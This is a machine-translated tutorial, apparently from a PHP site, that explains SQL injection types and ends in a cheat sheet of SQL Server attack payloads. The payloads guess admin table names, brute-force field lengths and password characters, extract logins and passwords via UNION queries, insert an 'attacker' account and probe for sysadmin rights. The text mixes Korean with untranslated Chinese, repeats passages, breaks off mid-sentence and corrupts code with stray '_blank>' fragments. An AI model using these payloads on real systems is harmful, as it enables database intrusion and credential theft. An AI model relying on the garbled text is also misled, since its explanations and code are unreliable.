SQL 주입 문에는 세 가지 유형이 있습니다. 1. "select * from table name where id=1 and 1=1"과 같은 문이 있는 숫자 주입 지점 2. "와 같은 문이 있는 문자 주입 지점 이름이..."인 테이블에서 *를 선택하십시오. 3. 주입 지점을 검색합니다.
이 문서의 운영 환경: Windows 7 시스템, SQL Server 2016 버전, Dell G3 컴퓨터.
일반적인 SQL 주입 문
웹 양식 제출에 SQL 명령을 삽입하거나 도메인 이름 또는 페이지 요청에 대한 쿼리 문자열을 입력하여 궁극적으로 서버를 속여 악성 SQL을 실행하게 합니다. 주문하다.
많은 웹 링크가 유사한 구조를 가지고 있습니다. http://xxx.com/users.php?id=1 기반 이런 형태의 인젝션을 일반적으로 디지털 인젝션 포인트라고 부르는데, 이는 인젝션 포인트 ID 유형이 숫자이기 때문입니다. 사용자 개인정보 조회, 기사 조회 등 대부분의 웹페이지에서 이러한 형태의 구조를 사용하여 인젝션 포인트를 전달합니다. ID 정보가 백엔드로 전달될 때까지 기다린 후, 데이터베이스에서 해당 정보를 쿼리하여 프런트엔드로 반환합니다. 이러한 유형의 SQL 문의 프로토타입은 아마도 select * from table name where id=1
일 것입니다. 주입이 있는 경우 폭발을 위해 다음과 유사한 SQL 주입 문을 구성할 수 있습니다. select * id=1 및 1=1인 테이블 이름에서
select * from 表名 where id=1
若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where id=1 and 1=1
网页链接有类似的结构 http://xxx.com/users.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where name='admin'
值得注意的是这里相比于数字型注入类型的sql语句原型多了引号,可以是单引号或者是双引号。若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where name='admin' and 1=1 '
我们需要将这些烦人的引号给处理掉。
这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有 "keyword=关键字"
有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like '%关键字%'
若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where 字段 like '%测试%' and '%1%'='%1%'
웹 링크의 구조는 http://xxx.com/users와 비슷합니다. php?name=admin 의 형태로 주입점의 이름형이 문자형이므로 문자 주입점이라고 합니다. 이 유형의 SQL 문 프로토타입은 아마도이것은 특별한 형태의 주입입니다. 이러한 유형의 삽입은 주로 데이터 검색을 수행할 때 검색 매개변수를 필터링하지 않는 것을 의미합니다. 일반적으로 링크 주소에select * from table name where name='admin'
일 것입니다. 숫자 주입 유형 SQL 문 프로토타입에 비해 더 많은 따옴표가 있다는 점은 주목할 가치가 있습니다. 작은따옴표나 큰따옴표일 수 있습니다. 삽입이 있는 경우 다음과 유사한 SQL 삽입 문을 구성하여 폭발시킬 수 있습니다.select * from table name where name='admin' and 1=1 '
우리는 이러한 짜증나는 인용문을 처리해야 합니다. 패배를 표시합니다.(3) 주입점 검색
"keyword=keyword"
가 포함되어 있지만 일부는 링크 주소에 표시되지 않습니다. Box 양식 제출을 통해 검색했습니다. 이러한 유형의 주입 지점에 의해 제출된 SQL 문의 프로토타입은 대략 다음과 같습니다. select * from table name where field like '%keyword%'
주입이 있는 경우 다음과 유사한 SQL 주입 문을 구성할 수 있습니다. 다음 분해: '%test%' 및 '%1%'='%1%'와 같은 필드가 있는 테이블 이름에서 * 선택
데이터가 제출되는 방식에 따라 분류
(1) GET 주입데이터 제출 방식은 GET이며, 주입 지점 위치는 GET 매개변수 섹션에 있습니다. 예를 들어, http://xxx.com/news.php?id=1이라는 링크가 있고 id는 주입 지점입니다. (2) POST 주입POST 메소드를 사용하여 데이터를 제출합니다. 주입 지점은 양식에서 자주 발생하는 POST 데이터 부분에 있습니다. (3) 쿠키 주입HTTP 요청은 클라이언트의 쿠키를 가져오며, 쿠키의 특정 필드에 주입 지점이 존재합니다.주입 지점은 HTTP 요청 헤더의 특정 필드에 있습니다. 예를 들어 User-Agent 필드에 존재합니다. 엄밀히 말하면 쿠키는 실제로 헤더 삽입의 한 형태로 간주되어야 합니다. HTTP 요청 중에 쿠키는 헤더의 필드이기 때문입니다.(4) HTTP 헤더 주입
실행 효과에 따라 분류
(1) 불리언 기반 블라인드 주입은 반환 페이지를 기준으로 조건이 참인지 거짓인지 판단할 수 있는 주입입니다. (2) 시간 기반 블라인드 주입은 페이지에서 반환된 내용을 기반으로 어떤 정보도 판단할 수 없다는 의미입니다. 조건문을 사용하여 시간 지연 문이 실행되는지(즉, 페이지 반환 여부)를 확인할 수 있습니다. 시간이 늘어납니다.)숫자 주입 기반
(4) Union 쿼리 주입Union Case Injection을 사용할 수 있습니다.
일반적으로 사용되는 명령문🎜1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. and 1=(select count(*) from admin where len(*)>0)-- and 1=(select count(*) from admin where len(用户字段名称name)>0) and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0) 5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 and 1=(select count(*) from admin where len(*)>0) and 1=(select count(*) from admin where len(name)>6) 错误 and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 and 1=(select count(*) from admin where len(name)=6) 正确 and 1=(select count(*) from admin where len(password)>11) 正确 and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 and 1=(select count(*) from admin where len(password)=12) 正确 6.猜解字符 and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. group by users.id having 1=1-- group by users.id, users.username, users.password, users.privs having 1=1-- ; insert into users values( 666, attacker, foobar, 0xffff )-- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id)- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank >_id,login_blank>_name)- UNION SELECT TOP 1 login_blank>_name FROM logintable- UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul-- 看_blank>服务器打的补丁=出错了打了SP4补丁 and 1=(select @@VERSION)-- 看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))-- 判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) and sa=(SELECT System_blank>_user)-- and user_blank>_name()=dbo-- and 0<>(select user_blank>_name()--🎜 권장(무료): 🎜sql tutorial🎜🎜
위 내용은 SQL 주입 문이란 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!